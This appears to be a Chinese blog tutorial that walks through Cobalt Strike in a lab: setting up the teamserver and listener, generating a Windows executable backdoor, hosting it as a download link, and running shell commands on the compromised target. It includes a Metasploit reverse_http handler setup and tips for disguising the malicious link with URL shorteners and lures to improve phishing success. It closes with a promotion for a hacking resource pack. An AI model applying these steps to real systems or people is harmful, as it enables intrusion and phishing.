Cobalt Strike
前言
由于最近忙着考试复习和学习 (不排除偷懒水分😂),发现也是挺长时间没有好好更新文章了,思考了一晚上发现自律方面还有很大的进步空间啊,这边也是赶紧加班更新了一篇CS的使用呢,那就一起来学习一下叭😁;
简介
- CS是一个常用的渗透测试工具,全称为"Cobalt Strike",它是一款针对渗透测试和红队操作而设计的工具,主要用于模拟攻击和检测网络安全漏洞,常被业界人称为CS神器;Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作;
功能使用
多功能性:CS提供了多种功能,包括端口扫描、漏洞扫描、远程控制、数据收集、密码破解等;
多平台支持:CS能够在多种操作系统上运行,包括Windows、Linux、Mac OS等;
多种协议支持:CS支持多种协议,包括TCP、UDP、HTTP、HTTPS、DNS等;
高度可定制化:CS的用户界面可以自定义,用户可以根据自己的需求来设置不同的选项和功能;
高度隐蔽性:CS能够伪装成各种流量,让攻击者很难被检测到;
下载与安装
- 下载CS工具并将CS上传至kali机并进行解压;
- 进入CS工具目录,简单介绍下大致的文件作用;
c2lint: 用于检查profile的错误异常
teamserver: 服务端程序
cobaltstrike,cobaltstrike.jar: 客户端程序(java跨平台)
logs: 目录记录与目标主机的相关信息
update,update.jar: 用于更新CS
third-party: 第三方工具
最核心的就是teamserver和cobaltstrike.jar: 分别是服务端和客户端
基础使用
- 启动服务端;
#赋予服务器权限
chmod 777 teamserver
#启动cs服务器
./teamserver 服务端IP 密码
- kali执行命令,启动客户端,记得也要先赋予权限才可执行;(
注:这里有个小坑,不知道有木有中招的小伙伴,使用kali的终端执行该命令才可打开控制台,而通过SSH连接的终端连接不上)
- 点击后会弹出一个服务指纹信息,点击是即可,成功连接上CS;
CS如何成功上线
所需环境
攻击机(kali)
目标靶机(win 10)
添加监听
- 来到监听器位置
Cobalt Strike—>Listeners;
- 点击下面的
Listeners页面,接着添加Add配置信息;
生成后门木马
- 选择生成攻击后门文件
Attacks—>Packages—>Windows Executable;
- 将生成的木马文件保存到一个文件夹下;
钓鱼链接
- 来到攻击模块
Attacks—>Web drive-by—>Host file;
- 复制生成的链接;(
注:小提一嘴,一般情况下直接发送链接很容易被识破,我们可以使用短链接生成器生成一个短链接,接着配合一些图片或页面,这样可以大大提高命中率,由于只是测试这里就不演示了哟,也是提供一个思路或方法)
- 将该恶意链接发送至目标靶机,当靶机用户访问时即会下载该木马文件;(注:需要关闭防火墙,杀毒软件等)
成功拿到shell
- 假设靶机用户比较好奇,无意中点击执行了该恶意文件,返回到CS中可以看到目标已成功上线;
- 拿到shell该怎么执行命令呢?别急别急,这就来了;
#查看IP信息
shell ipconfig
#查看用户
net user
- 执行desktop命令,还可看到靶机用户桌面实时情况;
CS如何联动MSF
所需环境
攻击机(kali)
目标靶机(win 10)
前提条件
- 必须确保目标靶机已成功上线,这里就不一一演示了哟;
MSF配置监听模块
- kali打开msfconsole;
- 设置模块,配置payload信息并执行攻击;
#使用监听模块
use exploit/multi/handler
#配置payload
set payload windows/meterpreter/reverse_http
#配置IP和端口
set lhost kali-ip
set lport 端口
#开始攻击
run/exploit
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网络安全面试题
绿盟护网行动
还有大家最喜欢的黑客技术
网络安全源码合集+工具包
所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
详情docs.qq.com/doc/DSlhRRFFyU2pVZGhS
